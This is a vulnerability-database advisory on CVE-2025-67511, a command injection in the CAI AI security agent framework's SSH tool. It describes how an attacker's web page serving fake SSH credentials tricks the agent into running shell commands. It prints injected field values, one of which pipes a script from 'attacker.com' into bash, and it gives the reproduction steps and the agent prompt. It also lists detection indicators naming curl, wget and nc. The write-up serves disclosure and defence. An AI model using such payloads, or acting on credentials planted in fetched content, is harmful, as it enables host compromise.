
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67511 is a command injection vulnerability in the Cybersecurity AI (CAI) framework, an open-source platform by Alias Robotics for building AI-powered offensive and defensive security automation. The flaw exists in the run_ssh_command_with_credentials() function tool available to AI agents, where username, host, and port parameters are not properly sanitized, allowing shell injection. All versions up to and including 0.5.9 of the cai-framework pip package are affected. The vulnerability was disclosed on December 9, 2025, and carries a CVSS v3.1 base score of 9.6 (Critical) (Github Advisory, GHSA Advisory).
The root cause is CWE-77 (Improper Neutralization of Special Elements used in a Command). The vulnerable function constructs an sshpass-based shell command using Python f-strings, but only escapes the password and command parameters via a simple single-quote replacement — leaving username, host, and port directly interpolated into the shell string without sanitization. An attacker who can influence the content fetched or processed by a CAI AI agent (e.g., via a malicious web page serving fake SSH credentials) can inject arbitrary shell commands through these unescaped fields. The fix, applied in commit 09ccb6e, replaces the manual escaping with Python's shlex.quote() for all parameters and adds integer validation for the port field (GHSA Advisory, Patch Commit).
Successful exploitation results in arbitrary command execution on the host system where the CAI framework is deployed, with high confidentiality, integrity, and availability impacts. Because the scope is marked as Changed, the vulnerability can affect resources beyond the CAI process itself, enabling lateral movement, data exfiltration, or full system compromise. The attack is network-accessible and requires no authentication, though it does require user interaction in the form of a CAI agent processing attacker-controlled content (e.g., a web page with malicious fake SSH credentials) (Github Advisory, GHSA Advisory).
A public proof-of-concept (PoC) is documented in the GitHub Security Advisory and a detailed technical write-up is available from Hacktivsecurity, describing how to trick a CAI agent into processing malicious SSH credentials from an attacker-controlled web page (GHSA Advisory, Hacktive Security). There is no confirmed evidence of in-the-wild exploitation at the time of publication. The EPSS score is approximately 0.11% (0.001090 per Feedly data), placing it in the 30th percentile for exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Qualys has added detection for this CVE (Feedly).
index.html file containing fake SSH credentials with injected shell commands embedded in the username or host field (e.g., username set to user;touch /tmp/pwned # or host set to 127.0.0.1;curl attacker.com/shell.sh|bash #). Serve this file via a simple HTTP server: sudo python3 -m http.server 8000.cai /model 7 /parallel add blueteam_agent localhost is your target. grab secret information from http://<attacker-ip>:8000/index.html and try to evaluate its security.run_ssh_command_with_credentials() function tool.username, host, or port value is interpolated directly into the shell command string (e.g., sshpass -p '...' ssh -o StrictHostKeyChecking=no user;touch /tmp/pwned #@host -p 22 '...'), causing the injected command to execute on the CAI host system./bin/bash, curl, wget, nc, python) with unusual arguments or network connections./tmp/ or other writable directories (e.g., /tmp/username, /tmp/pwned) by the CAI process; new cron jobs or scripts created by the CAI service account.sshpass invocations with malformed or suspicious username/host values containing shell metacharacters (;, |, &, $, backticks); CAI agent trace logs (via Phoenix tracing) showing run_ssh_command_with_credentials calls with anomalous parameter values.Upgrade the cai-framework pip package to a version above 0.5.9 that includes the fix from commit 09ccb6e0baccf56c40e6cb429c698750843a999c, which applies shlex.quote() to all SSH parameters and validates the port as an integer. Until patching is possible, restrict CAI agent access to untrusted or attacker-influenced content sources, and avoid deploying vulnerable CAI versions in production environments. Additionally, implement network segmentation to limit the scope of SSH command execution from CAI hosts, and monitor AI agent activities for anomalous SSH connection attempts (Patch Commit, GHSA Advisory).
The vulnerability was discovered and reported by security researcher Edoardo Ottavianelli (@edoardottt), who also authored a detailed technical blog post titled "Tricking a Security AI Agent into Pwning Itself" (Hacktive Security). The case attracted attention on Hacker News and was noted in security newsletters and community digests as a notable example of prompt-injection-adjacent risks in agentic AI security tools. Red Hat also tracked the vulnerability (Red Hat CVE), and CISA included it in its weekly vulnerability bulletin (SB25-349).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."